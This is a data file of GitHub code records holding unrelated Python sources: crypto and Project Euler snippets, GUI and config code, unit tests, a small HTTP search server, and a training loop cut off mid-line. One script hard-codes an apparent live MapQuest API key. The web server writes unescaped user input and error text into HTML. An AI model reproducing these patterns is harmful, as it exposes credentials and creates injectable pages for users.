plt.close()\n","repo_name":"ftir-mc/RMSESpectraC","sub_path":"RMSESpectraC.py","file_name":"RMSESpectraC.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72158154659","text":"import hashlib\n\ndef modify(m):\n l = list(m)\n l[0] = l[0] ^ 1\n return bytes(l)\n\nm = \"this is a top secret\".encode()\n\nsha256 = hashlib.sha256()\nsha256.update(m)\ndata = sha256.digest()\n\nprint(data)\nprint(modify(m))","repo_name":"cyx977/pythoncryptography","sub_path":"src/hash_fnctions.py","file_name":"hash_fnctions.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35269731350","text":"from PySide2.QtWidgets import QMainWindow, QFileDialog, QMessageBox, QTableWidgetItem, QGraphicsScene, QDialog\nfrom ui.ui_sucursal import Ui_Dialog\nfrom PySide2.QtCore import Slot\nfrom models.sucursal import Sucursal\n\n\nclass SucursalWindow(QDialog):\n def __init__(self, sucursal=None):\n super(SucursalWindow, self).__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.sucursal = sucursal\n\n self.ui.push_cancelar.clicked.connect(self.onClose)\n self.ui.push_guardar.clicked.connect(self.onSave)\n self.ui.checkBox.setChecked(True)\n\n if sucursal is not None:\n self.ui.edit_nombre.setText(sucursal['nombre'])\n self.ui.edit_telefono.setText(sucursal['telefono'])\n self.ui.edit_direccion.setText(sucursal['direccion'])\n self.ui.checkBox.setChecked(sucursal['activo'])\n\n @Slot()\n def onClose(self):\n self.done(0)\n\n @Slot()\n def onSave(self):\n nombre = self.ui.edit_nombre.text()\n telefono = self.ui.edit_telefono.text()\n direccion = self.ui.edit_direccion.text()\n activo = self.ui.checkBox.isChecked()\n sucursal = Sucursal(\n nombre=nombre,\n telefono=telefono,\n direccion=direccion,\n activo=activo\n )\n if self.sucursal is None:\n sucursal.save()\n else:\n sucursal._key=self.sucursal['nombre']\n sucursal.update()\n self.done(0)\n","repo_name":"Fairbrook/proyecto-SBD","sub_path":"controllers/sucursal.py","file_name":"sucursal.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71850674979","text":"import unittest\nfrom expresso.append_to_chain import append_to_chain\n\nclass TestAppendToChain(unittest.TestCase):\n def test_append_to_chain(self):\n block_chain = []\n new_block = {\n 'index': 1,\n 'timestamp': '2022-07-28 12:00:00',\n 'data': 'This is block 1',\n 'previous_hash': '0'\n }\n append_to_chain(block_chain, new_block)\n self.assertEqual(len(block_chain), 1)\n self.assertEqual(block_chain[0], new_block)\n \n def test_append_to_chain_with_multiple_blocks(self):\n block_chain = []\n new_block_1 = {\n 'index': 1,\n 'timestamp': '2022-07-28 12:00:00',\n 'data': 'This is block 1',\n 'previous_hash': '0'\n }\n new_block_2 = {\n 'index': 2,\n 'timestamp': '2022-07-28 12:05:00',\n 'data': 'This is block 2',\n 'previous_hash': 'd3b07384d113edec49eaa6238ad5ff00'\n }\n append_to_chain(block_chain, new_block_1)\n append_to_chain(block_chain, new_block_2)\n self.assertEqual(len(block_chain), 2)\n self.assertEqual(block_chain[0], new_block_1)\n self.assertEqual(block_chain[1], new_block_2)\n \nif __name__ == '__main__':\n unittest.main()","repo_name":"afewell/expresso_failed_2-4","sub_path":"tests/test_append_to_chain.py","file_name":"test_append_to_chain.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3609106504","text":"\"\"\"Parse the config file.\n\n:author: Shay Hill\n:created: 2023-02-03\n\"\"\"\n\nimport configparser\nimport sys\nfrom pathlib import Path\nfrom typing import Callable\n\nCONFIG_FILE = Path(\"todoist_export.ini\")\n\nCONFIG_TEMPLATE = \"\"\"\n# Enter comma-separated lists of sections and projects to include or exclude. By\n# default, every section and project will be included.\n#\n# -- If section_whitelist is blank, all sections will be included. If even one section\n# is listed, then section_whitelist becomes a whitelist and only the listed sections\n# will be included. The same rule applies for project_whitelist.\n#\n# -- Blacklist trumps whitelist, so if a section or project is both whitelisted and\n# blacklisted, it will be excluded. There really isn't a good reason to have both a\n# whitelist and a blacklist. Just use whatever is easier for you.\n#\n# -- Any task without a section will be put in \"no section\" (all lowercase). See\n# example for how to exclude.\n#\n# -- Entries here do not need quotes. Blank spaces in section or project names are\n# fine. Everything is case sensitive.\n#\n# -- example entries:\n# section_whitelist = Active, Postponed, Delegated, Put on Hold\n# section_blacklist = no section, Personal, Long Section Name With Multiple Spaces\n\n[todoist.filter]\nsection_whitelist =\nproject_whitelist =\nsection_blacklist =\nproject_blacklist =\n\"\"\"\n\n\ndef create_config_file():\n \"\"\"Create a config file template if one doesn't exist.\"\"\"\n if CONFIG_FILE.exists():\n do_overwrite = input(f\"Config file '{CONFIG_FILE}' exists. Overwrite? (y/N) \")\n if do_overwrite.lower() != \"y\":\n return\n _ = CONFIG_FILE.write_text(CONFIG_TEMPLATE[1:])\n _ = sys.stdout.write(f\"Config file '{CONFIG_FILE}' created.\\n\")\n\n\ndef _read_config() -> configparser.ConfigParser:\n \"\"\"Read the config file and return a ConfigParser object.\n\n :return: A ConfigParser object with the config file loaded.\n \"\"\"\n config = configparser.ConfigParser()\n config[\"todoist.filter\"] = {\n \"section_whitelist\": \"\",\n \"project_whitelist\": \"\",\n \"section_blacklist\": \"\",\n \"project_blacklist\": \"\",\n }\n _ = config.read(\"todoist_export.ini\")\n return config\n\n\ndef _split(config_value: str) -> set[str]:\n \"\"\"Split a comma-separated string into a set of strings.\n\n :param config_value: The comma-separated string to split.\n :return: A set of (stripped) strings.\n \"\"\"\n return {y.strip() for y in config_value.split(\",\") if y.strip()}\n\n\ndef get_user_defined_filters() -> Callable[[tuple[str, str, str]], bool]:\n \"\"\"Create filters from the config file (or defaults).\n\n :return: A tuple of (section_include_filter, project_include_filter).\n \"\"\"\n config = _read_config()\n section_whitelist = _split(config[\"todoist.filter\"][\"section_whitelist\"])\n project_whitelist = _split(config[\"todoist.filter\"][\"project_whitelist\"])\n section_blacklist = _split(config[\"todoist.filter\"][\"section_blacklist\"])\n project_blacklist = _split(config[\"todoist.filter\"][\"project_blacklist\"])\n\n def filter_table(table_line: tuple[str, str, str]) -> bool:\n \"\"\"Return True if the task should be included in the export.\n\n :param table_line: (section name, project name, task content) tuple.\n :return: True if the task should be included in the export.\n \"\"\"\n section, project, _ = table_line\n if section in section_blacklist:\n return False\n if project in project_blacklist:\n return False\n if section_whitelist and section not in section_whitelist:\n return False\n if project_whitelist and project not in project_whitelist:\n return False\n return True\n\n return filter_table\n","repo_name":"ShayHill/todoist_export","sub_path":"src/todoist_export/parse_config.py","file_name":"parse_config.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3263105290","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 18 16:08:15 2017\n\n@author: Jakub-P.Lech\n\nProject Euler 10: Find the sum of all primes below 2 million\n\"\"\"\n\nfrom euler import primesLessThan\n\ndef main():\n primes = list(primesLessThan(2000000))\n print(sum(x for x in primes))\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"Jakub-L/project-euler","sub_path":"python/010.py","file_name":"010.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35295001210","text":"import json\nimport requests\nfrom airbnb import Airbnb\n\n\nwith open('output.json', 'r') as fh:\n raw = fh.read()\n listings = json.loads(raw)\n\n result = []\n for listing in listings:\n pic_url = listing.get('XL Picture Url')\n if not pic_url:\n print('No pic url, skip')\n continue\n zip_code = listing.get('Zipcode')\n if not zip_code:\n print('No zipcode·, skip')\n continue\n geocode_endpoint = f'http://www.mapquestapi.com/geocoding/v1/address?key=Ss0Djui9aTLold64q5lAtzw2lcg6kiJN&location={zip_code}'\n\n res = requests.get(geocode_endpoint)\n if not res.ok:\n raise Exception(\"Unable to fetch geocode info\")\n jsonRes = res.json()\n coord = jsonRes['results'][0]['locations'][0]['latLng']\n lat = coord['lat']\n lng = coord['lng']\n\n obj = Airbnb(lat, lng)\n\n analysis = obj.process_danger_level()\n\n listing['danger_index'] = analysis.get('danger_index')\n listing['crimes_count'] = analysis.get('crimes_count')\n print(f'processed one danger_index successfully')\n\n result.append(listing)\n\n with open('alldata.json', 'w') as fh:\n fh.write(json.dumps(result))\n\n","repo_name":"tywin1104/SafeBnb-DataAnalysis","sub_path":"classifiy_airbnb.py","file_name":"classifiy_airbnb.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24835151372","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\r\nfrom urllib.parse import unquote\r\nimport urllib.parse as urllib\r\nimport os\r\nimport re\r\nfrom searchengine import SearchEngine\r\n\"\"\"\r\nThis is a response, that server sends back to the client\r\n1st peace without from and data\r\n\"\"\"\r\nresp = \"\"\"\r\n \r\n ASXER (Anya's Super indeXER)\r\n \r\n \"\"\"\r\ndata=\"\"\"\r\n
    \r\n
    \r\n

    Enter query to search

    \r\n
    \r\n
    \r\n {1}\r\n
    \r\n

    \r\n © ASXER (Anya's Super indeXER)\r\n
    \r\n \r\n\r\n\"\"\"\r\n\r\nclass WebServer(BaseHTTPRequestHandler):\r\n \"\"\"\r\n This class is used for request handling in our searchengine\r\n \"\"\"\r\n def do_GET(self):\r\n \"\"\"\r\n Defaut get request from client to get site\r\n \"\"\"\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html; charset=utf-8\")\r\n self.end_headers()\r\n response = \"\"\"\r\n Documents Limit

    \r\n Documents Offset

    \r\n \"\"\"\r\n files = os.listdir(\".\\\\\")\r\n i = 0\r\n for file in files:\r\n if re.match(\".*\\.txt\", file):\r\n response += (file + \"
    \")\r\n response += 'Limit

    '\r\n response += 'Offset

    '\r\n response += ''\r\n response += ''\r\n response += '
    '\r\n i = i + 1\r\n self.wfile.write(bytes((resp + data.format('', response)), \"utf-8\"))\r\n\r\n\r\n def get_new_offset_limit(self, action='', action_doc='', offsets=[], limits=[]):\r\n '''\r\n function for getting next/prev results of research\r\n :param action: next or back or perv\r\n :param action_doc: for which document\r\n :param offsets: offsets list\r\n :param limits: limits list\r\n :return: new offsets list\r\n '''\r\n doc_num = int(action_doc.replace('action', ''))\r\n print(action)\r\n if action == 'next':\r\n offsets[doc_num] = str(int(offsets[doc_num]) + int(limits[doc_num]))\r\n if action == 'back':\r\n offsets[doc_num] = str(int(offsets[doc_num]) - int(limits[doc_num]))\r\n if int(offsets[doc_num]) < 0:\r\n offsets[doc_num] = str(0)\r\n if action == 'perv':\r\n offsets[doc_num] = str(0)\r\n return offsets\r\n\r\n\r\n def parse_url(self, body=''):\r\n '''\r\n function for parsing request string\r\n :param body: string with parameters of request\r\n :return: parsed parameters\r\n '''\r\n s = unquote(urllib.urlparse(body)[2], \"utf-8\").replace(\"b'\", \"\").replace(\"'\", \"\").replace(\"\\\"\", '')\r\n query_data = urllib.parse_qs(s)\r\n print(\"data = \" + str(query_data))\r\n query = str(query_data['query'][0])\r\n limit = str(query_data['limit'][0])\r\n offset = str(query_data['offset'][0])\r\n if (re.match('\\D', limit)) or (re.match('\\D', offset)):\r\n raise TypeError\r\n if int(limit) < 0 or int(offset) < 0:\r\n raise TypeError\r\n action = ''\r\n action_doc = ''\r\n limits = []\r\n offsets = []\r\n action_exists = False\r\n for key in query_data.keys():\r\n if re.match('action.', key):\r\n action = str(query_data[key][0])\r\n action_doc = str(key)\r\n action_exists = True\r\n if re.match('doc.limit', key):\r\n if (re.match('\\D', query_data[key][0])) or (int(query_data[key][0]) < 0):\r\n raise TypeError\r\n limits.append(query_data[key][0])\r\n if re.match('doc.offset', key):\r\n if (re.match('\\D', query_data[key][0])) or (int(query_data[key][0]) < 0):\r\n raise TypeError\r\n offsets.append(query_data[key][0])\r\n return query, limit, offset, limits, offsets, action, action_doc, action_exists\r\n\r\n def do_POST(self):\r\n \"\"\"\r\n POST handler for query\r\n \"\"\"\r\n try:\r\n content_length = int(self.headers['Content-Length'])\r\n body = str(self.rfile.read(content_length))\r\n print(\"body = \" + body)\r\n query, limit, offset, limits, offsets, action, action_doc, action_exists = self.parse_url(body)\r\n print(\"query = \" + query)\r\n print(\"doclimit = \" + limit)\r\n print(\"docoffset = \" + offset)\r\n print(\"action = \" + action)\r\n print(\"actiondoc = \" + action_doc)\r\n if action_exists:\r\n offsets = self.get_new_offset_limit(action, action_doc, offsets, limits)\r\n print('limits = ' + str(limits))\r\n print('offsets = ' + str(offsets))\r\n search_engine = SearchEngine('database')\r\n r = search_engine.search_limit_offset(query, 4, limit, offset, limits, offsets)\r\n myresp = ''\r\n myresp += 'Documents Limit

    '\r\n myresp += 'Documents Offset

    '\r\n key_list = list(r.keys())\r\n key_list.sort()\r\n j = 0\r\n for key in key_list:\r\n myresp += '
      \\n'\r\n myresp += '
    1. ' + key + '
    2. \\n
        '\r\n myresp += 'Limit

        '\r\n myresp += 'Offset

        '\r\n myresp += ''\r\n myresp += ''\r\n myresp += '
        '\r\n for val in r[key]:\r\n myresp += '
      • '+val+'
      • '\r\n myresp += '
      '\r\n j = j + 1\r\n myresp += '
    '\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html; charset=utf-8\")\r\n self.end_headers()\r\n self.wfile.write(bytes((resp + data.format(query, myresp)), \"utf-8\"))\r\n except TypeError:\r\n response = 'fields \"limit\" and \"offset\" can not take a negative or fractional values'\r\n self.wfile.write(bytes((resp + data.format('', response)), \"utf-8\"))\r\n except Exception as ex:\r\n response = '
    Uuups. Something went wrong. Error message: ' + str(ex) + '
    '\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html; charset=utf-8\")\r\n self.end_headers()\r\n files = os.listdir(\".\\\\\")\r\n i = 0\r\n response += 'Documents Limit

    '\r\n response += 'Documents Offset

    '\r\n for f in files:\r\n if re.match(\".*\\.txt\", f):\r\n response += (f + \"
    \")\r\n response += 'Limit

    '\r\n response += 'Offset

    '\r\n response += ''\r\n response += ''\r\n response += '
    '\r\n i = i + 1\r\n self.wfile.write(bytes((resp + data.format('', 'Not Found
    ' + response)), \"utf-8\"))\r\n\r\n\r\nws = HTTPServer(('0.0.0.0', 80), WebServer)\r\n\r\n# Server running until Ctrl-C pressed\r\ntry:\r\n ws.serve_forever()\r\nexcept KeyboardInterrupt:\r\n pass\r\n\r\nws.server_close()\r\n","repo_name":"anyasidr/my-repository","sub_path":"webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":9025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32876069820","text":"from devices.cubelib import rgbemulator as emulator\nfrom devices.cubelib import rgbwireframe as wireframe\nfrom devices.rgbanimations import *\n\npv = emulator.ProjectionViewer(640,480)\nwf = wireframe.Wireframe()\npv.createCube(wf)\n\n\nstart = (0, 0, 0)\n\ndef cubeProcess(cube, signal, count):\n start = (0, 0, 0)\n point = (0,0)\n #planeBounce(cube,(count/20)%2+1,count%20)\n colours = [[1,0,0],[0,1,0],[0,0,1]]\n #start = wireframeExpandContractFrames(cube,start,colours[(count/7)%3],count)\n rain(cube,count,2,4,1)\n #colourCube(cube)\n #quadrantColourSwap(cube)\n #time.sleep(.1)\n #point = voxel(cube,count,point)\n #sine_wave(cube,count)\n #pyramids(cube,count)\n #side_waves(cube,count)\n #fireworks(cube,4)\n #technites(cube,count)\n #planeBounce(cube,(count/8)%3,count%8,colours[(count/8)%3])\n cube.redraw(wf, pv)\n return count + 1\n","repo_name":"NITK-Technites/LED_Wall","sub_path":"Software/src/apps/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"15468270005","text":"from aoc_get import get_input\r\nfrom math import prod\r\n\r\ninp = get_input().splitlines()\r\n\r\ndef surround(grid):\r\n h = len(grid)\r\n w = len(grid[0])\r\n res = ['.' * (w + 2)]\r\n for i in range(h):\r\n res.append('.' + grid[i] + '.')\r\n res.append('.' * (w + 2))\r\n return res\r\n\r\ndef count_around(ii, jj, g):\r\n #up left\r\n ul = '.'\r\n i = ii - 1\r\n j = jj - 1\r\n while i > 0 and j > 0 and ul == '.':\r\n if g[i][j] != '.':\r\n ul = g[i][j]\r\n i -= 1\r\n j -= 1\r\n\r\n #up center\r\n uc = '.'\r\n i = ii - 1\r\n j = jj\r\n while i > 0 and uc == '.':\r\n if g[i][j] != '.':\r\n uc = g[i][j]\r\n i -= 1\r\n\r\n #up right\r\n ur = '.'\r\n i = ii - 1\r\n j = jj + 1\r\n while i > 0 and j < len(g[0]) and ur == '.':\r\n if g[i][j] != '.':\r\n ur = g[i][j]\r\n i -= 1\r\n j += 1\r\n\r\n #center left\r\n cl = '.'\r\n i = ii\r\n j = jj - 1\r\n while j > 0 and cl == '.':\r\n if g[i][j] != '.':\r\n cl = g[i][j]\r\n j -= 1\r\n\r\n #center right\r\n cr = '.'\r\n i = ii\r\n j = jj + 1\r\n while j < len(g[0]) and cr == '.':\r\n if g[i][j] != '.':\r\n cr = g[i][j]\r\n j += 1\r\n\r\n #down left\r\n dl = '.'\r\n i = ii + 1\r\n j = jj - 1\r\n while j > 0 and i < len(g) and dl == '.':\r\n if g[i][j] != '.':\r\n dl = g[i][j]\r\n i += 1\r\n j -= 1\r\n\r\n #down center\r\n dc = '.'\r\n i = ii + 1\r\n j = jj\r\n while i < len(g) and dc == '.':\r\n if g[i][j] != '.':\r\n dc = g[i][j]\r\n i += 1\r\n\r\n #down right\r\n dr = '.'\r\n i = ii + 1\r\n j = jj + 1\r\n while j < len(g) and i < len(g[0]) and dr == '.':\r\n if g[i][j] != '.':\r\n dr = g[i][j]\r\n i += 1\r\n j += 1\r\n\r\n #p2\r\n around = ul + uc + ur + cl + cr + dl + dc + dr\r\n\r\n #p1\r\n #around = [g[i-1][j-1], g[i-1][j], g[i-1][j+1], g[i][j-1],\r\n # g[i][j+1], g[i+1][j-1], g[i+1][j], g[i+1][j+1]]\r\n res = around.count('#')\r\n return res\r\n\r\ndef next_round(grid):\r\n width = len(grid[0])\r\n res = ['.' * width]\r\n for i in range(1, len(grid) - 1):\r\n w = '.'\r\n for j in range(1, len(grid) - 1):\r\n cur = grid[i][j]\r\n if cur == '.':\r\n w += '.'\r\n else:\r\n n = count_around(i, j, grid)\r\n if n == 0:\r\n w += '#' \r\n elif n >= 5:\r\n w += 'L'\r\n else:\r\n w += cur\r\n res.append(w + '.')\r\n res.append('.' * width)\r\n return res\r\n\r\ndef count_occ(grid) -> int:\r\n return str(grid).count('#')\r\n\r\ndef prints(seats):\r\n for s in seats:\r\n print(s)\r\n print('--------')\r\n\r\n#inp = '''#.##.##.##\r\n########.##\r\n##.#.#..#..\r\n#####.##.##\r\n##.##.##.##\r\n##.#####.##\r\n#..#.#.....\r\n###########\r\n##.######.#\r\n##.#####.##'''.splitlines()\r\nseats = surround(inp)\r\n\r\ninc = -1\r\nnum_occ = 0\r\n#prints(seats)\r\n\r\nwhile inc != 0:\r\n seats = next_round(seats)\r\n #prints(seats)\r\n new_num_occ = count_occ(seats)\r\n inc = new_num_occ - num_occ\r\n num_occ = new_num_occ\r\n #print(num_occ)\r\nprint(num_occ)\r\n","repo_name":"ntnco/AoC","sub_path":"2020/2020_11.py","file_name":"2020_11.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"39399777080","text":"import numpy as np\r\nfrom tqdm import tqdm\r\nfrom math import exp\r\nimport os\r\nimport signal\r\nimport json\r\nimport argparse\r\nimport pickle as pkl\r\nfrom dataset import dataset, CRSdataset\r\nfrom model import TransformerModel\r\nimport torch.nn as nn\r\nfrom torch import optim\r\nimport torch\r\ntry:\r\n import torch.version\r\n import torch.distributed as dist\r\n TORCH_AVAILABLE = True\r\nexcept ImportError:\r\n TORCH_AVAILABLE = False\r\nfrom nltk.translate.bleu_score import sentence_bleu\r\nimport nltk\r\nimport re\r\nimport pickle\r\nimport logging\r\nimport ipdb\r\n\r\ndef is_distributed():\r\n \"\"\"\r\n Returns True if we are in distributed mode.\r\n \"\"\"\r\n return TORCH_AVAILABLE and dist.is_available() and dist.is_initialized()\r\n\r\n\r\ndef create_logger(args):\r\n \"\"\"\r\n 将日志输出到日志文件和控制台\r\n \"\"\"\r\n logger = logging.getLogger(__name__)\r\n logger.setLevel(logging.INFO)\r\n\r\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\r\n\r\n # 创建一个handler,用于写入日志文件\r\n file_handler = logging.FileHandler(filename=args.log_path)\r\n file_handler.setFormatter(formatter)\r\n file_handler.setLevel(logging.INFO)\r\n logger.addHandler(file_handler)\r\n\r\n # 创建一个handler,用于将日志输出到控制台\r\n console = logging.StreamHandler()\r\n console.setLevel(logging.DEBUG)\r\n console.setFormatter(formatter)\r\n logger.addHandler(console)\r\n\r\n return logger\r\n\r\n\r\ndef setup_args():\r\n train = argparse.ArgumentParser()\r\n train.add_argument(\"-exp_name\", \"--exp_name\", type=str, default='v1')\r\n\r\n train.add_argument(\"-max_c_length\",\r\n \"--max_c_length\",\r\n type=int,\r\n default=256)\r\n train.add_argument(\"-max_r_length\", \"--max_r_length\", type=int, default=50)\r\n train.add_argument(\"-batch_size\", \"--batch_size\", type=int, default=64)\r\n train.add_argument(\"-max_count\", \"--max_count\", type=int, default=20)\r\n train.add_argument(\"-use_cuda\", \"--use_cuda\", type=bool, default=False)\r\n train.add_argument(\"-process_data\",\r\n \"--process_data\",\r\n type=bool,\r\n default=False)\r\n train.add_argument(\"-load_dict\", \"--load_dict\", type=str, default=None)\r\n train.add_argument(\"-model_save_path\",\r\n \"--model_save_path\",\r\n type=str,\r\n default='saved_model/net_parameter1.pkl')\r\n train.add_argument(\"-learningrate\",\r\n \"--learningrate\",\r\n type=float,\r\n default=1)\r\n train.add_argument(\"-optimizer\", \"--optimizer\", type=str, default='sgd')\r\n train.add_argument(\"-momentum\", \"--momentum\", type=float, default=0)\r\n train.add_argument(\"-embedding_type\",\r\n \"--embedding_type\",\r\n type=str,\r\n default='random')\r\n train.add_argument(\"-epoch\", \"--epoch\", type=int, default=1000)\r\n train.add_argument(\"-gpu\", \"--gpu\", type=str, default='1')\r\n train.add_argument(\"-gradient_clip\",\r\n \"--gradient_clip\",\r\n type=float,\r\n default=0.1)\r\n train.add_argument(\"-embedding_size\",\r\n \"--embedding_size\",\r\n type=int,\r\n default=300)\r\n\r\n train.add_argument(\"-n_heads\", \"--n_heads\", type=int, default=2)\r\n train.add_argument(\"-n_layers\", \"--n_layers\", type=int, default=2)\r\n train.add_argument(\"-ffn_size\", \"--ffn_size\", type=int, default=300)\r\n\r\n train.add_argument(\"-dropout\", \"--dropout\", type=float, default=0.1)\r\n train.add_argument(\"-attention_dropout\",\r\n \"--attention_dropout\",\r\n type=float,\r\n default=0.0)\r\n train.add_argument(\"-relu_dropout\",\r\n \"--relu_dropout\",\r\n type=float,\r\n default=0.1)\r\n\r\n train.add_argument(\"-learn_positional_embeddings\",\r\n \"--learn_positional_embeddings\",\r\n type=bool,\r\n default=False)\r\n train.add_argument(\"-embeddings_scale\",\r\n \"--embeddings_scale\",\r\n type=bool,\r\n default=True)\r\n\r\n train.add_argument(\"-n_entity\", \"--n_entity\", type=int, default=64368)\r\n train.add_argument(\"-n_relation\", \"--n_relation\", type=int, default=214)\r\n train.add_argument(\"-n_concept\", \"--n_concept\", type=int, default=29308)\r\n train.add_argument(\"-n_con_relation\",\r\n \"--n_con_relation\",\r\n type=int,\r\n default=48)\r\n train.add_argument(\"-dim\", \"--dim\", type=int, default=128)\r\n train.add_argument(\"-n_hop\", \"--n_hop\", type=int, default=2)\r\n train.add_argument(\"-kge_weight\", \"--kge_weight\", type=float, default=1)\r\n train.add_argument(\"-l2_weight\", \"--l2_weight\", type=float, default=2.5e-6)\r\n train.add_argument(\"-n_memory\", \"--n_memory\", type=float, default=32)\r\n train.add_argument(\"-item_update_mode\",\r\n \"--item_update_mode\",\r\n type=str,\r\n default='0,1')\r\n train.add_argument(\"-using_all_hops\",\r\n \"--using_all_hops\",\r\n type=bool,\r\n default=True)\r\n train.add_argument(\"-num_bases\", \"--num_bases\", type=int, default=8)\r\n\r\n train.add_argument(\"-same_data\", \"--same_data\", type=bool, default=False)\r\n # train.add_argument(\"--bpe2vec\",type=str,default='../../data/bpe2vec.npy')\r\n train.add_argument(\"--bpe2index\",\r\n type=str,\r\n default='../../data/data1030/output/bpe2index.json')\r\n train.add_argument('--do_eval', action='store_true', default=False)\r\n\r\n train.add_argument(\"-train_data_file\",\r\n \"--train_data_file\",\r\n type=str,\r\n default=\"../../data/data1030/output/train_cut.pkl\",\r\n help='要处理的数据的位置')\r\n train.add_argument(\"-valid_data_file\",\r\n \"--valid_data_file\",\r\n type=str,\r\n default=\"../../data/data1030/output/valid_cut.pkl\",\r\n help='要处理的数据的位置')\r\n train.add_argument(\"-test_data_file\",\r\n \"--test_data_file\",\r\n type=str,\r\n default=\"../../data/data1030/output/test_cut.pkl\",\r\n help='要处理的数据的位置')\r\n\r\n train.add_argument('--log_path',\r\n default='log/{}.log',\r\n type=str,\r\n required=False,\r\n help='训练日志存放位置') #todo\r\n train.add_argument(\"-use_size\", \"--use_size\", type=int,\r\n default=-1) # pad_size,与其他模型不统一\r\n return train\r\n\r\n\r\ndef _create_dictionary():\r\n '''\r\n word2index\r\n '''\r\n pass\r\n return {}\r\n\r\n\r\nclass TrainLoop_Transformer():\r\n def __init__(self, opt):\r\n self.opt = opt\r\n\r\n self.dict = json.load(open(args.bpe2index, encoding='utf-8'))\r\n self.index2word = {self.dict[key]: key for key in self.dict}\r\n\r\n self.batch_size = self.opt['batch_size']\r\n self.epoch = self.opt['epoch']\r\n self.use_cuda = opt['use_cuda']\r\n print('self.use_cuda:', self.use_cuda)\r\n\r\n self.device = 'cuda:{}'.format(\r\n self.opt['gpu']) if self.use_cuda else 'cpu'\r\n self.opt['device'] = self.device\r\n\r\n self.movie_ids = pkl.load(open(\"data/movie_ids.pkl\", \"rb\"))\r\n\r\n # self.metrics_gen = {\r\n # \"ppl\": 0,\r\n # \"dist1\": 0,\r\n # \"dist2\": 0,\r\n # \"dist3\": 0,\r\n # \"dist4\": 0,\r\n # \"bleu1\": 0,\r\n # \"bleu2\": 0,\r\n # \"bleu3\": 0,\r\n # \"bleu4\": 0,\r\n # \"count\": 0\r\n # }\r\n\r\n self.build_data()\r\n self.build_model()\r\n\r\n # self.init_optim(\r\n # [p for p in self.model.parameters() if p.requires_grad],\r\n # optim_states=states.get('optimizer'),\r\n # saved_optim_type=states.get('optimizer_type')\r\n # )\r\n self.init_optim(\r\n [p for p in self.model.parameters() if p.requires_grad])\r\n\r\n def build_data(self):\r\n if self.opt['process_data']:\r\n self.train_dataset = dataset(\r\n \"../../data/data1030/output/train_cut.pkl\", self.opt, 'train')\r\n self.valid_dataset = dataset(\r\n \"../../data/data1030/output/valid_cut.pkl\", self.opt, 'valid')\r\n self.test_dataset = dataset(\r\n \"../../data/data1030/output/test_cut.pkl\", self.opt, 'test')\r\n\r\n self.train_processed_set = self.train_dataset.data_process(True)\r\n self.valid_processed_set = self.valid_dataset.data_process(True)\r\n self.test_processed_set = self.test_dataset.data_process(True)\r\n\r\n pickle.dump(self.train_processed_set,\r\n open('data/train_processed_set.pkl', 'wb'))\r\n pickle.dump(self.valid_processed_set,\r\n open('data/valid_processed_set.pkl', 'wb'))\r\n pickle.dump(self.test_processed_set,\r\n open('data/test_processed_set.pkl', 'wb'))\r\n logger.info(\"[Save processed data]\")\r\n else:\r\n try:\r\n self.train_processed_set = pickle.load(\r\n open('data/train_processed_set.pkl', 'rb'))\r\n self.valid_processed_set = pickle.load(\r\n open('data/valid_processed_set.pkl', 'rb'))\r\n self.test_processed_set = pickle.load(\r\n open('data/test_processed_set.pkl', 'rb'))\r\n except:\r\n assert 1 == 0, \"No processed data\"\r\n logger.info(\"[Load processed data]\")\r\n\r\n def build_model(self):\r\n self.model = TransformerModel(self.opt, self.dict)\r\n # todo\r\n if self.opt['embedding_type'] != 'random':\r\n pass\r\n\r\n if self.opt['load_dict'] is not None:\r\n logger.info('[ Loading existing model params from {} ]'\r\n ''.format(self.opt['load_dict']))\r\n self.model.load_model(self.opt['load_dict'])\r\n\r\n if self.use_cuda:\r\n self.model.to(self.device)\r\n\r\n def train(self):\r\n losses = []\r\n best_val_gen = 1000\r\n gen_stop = False\r\n patience = 0\r\n max_patience = 5\r\n num = 0\r\n\r\n # file_temp = open('temp.txt', 'w')\r\n # train_output_file = open(f\"output_train_tf.txt\", 'w', encoding='utf-8')\r\n\r\n for i in range(self.epoch):\r\n train_set = CRSdataset(self.train_processed_set,\r\n self.opt['n_entity'], self.opt['n_concept'])\r\n train_dataset_loader = torch.utils.data.DataLoader(\r\n dataset=train_set, batch_size=self.batch_size,\r\n shuffle=True) # shuffle\r\n\r\n for context,c_lengths,response,r_length,mask_response, \\\r\n mask_r_length,entity,entity_vector,movie,\\\r\n concept_mask,dbpedia_mask,concept_vec, \\\r\n db_vec,rec in tqdm(train_dataset_loader):\r\n ####################################### 检验输入输出ok\r\n # file_temp.writelines(\"[Context] \", self.vector2sentence(context))\r\n # file_temp.writelines(\"[Response] \", 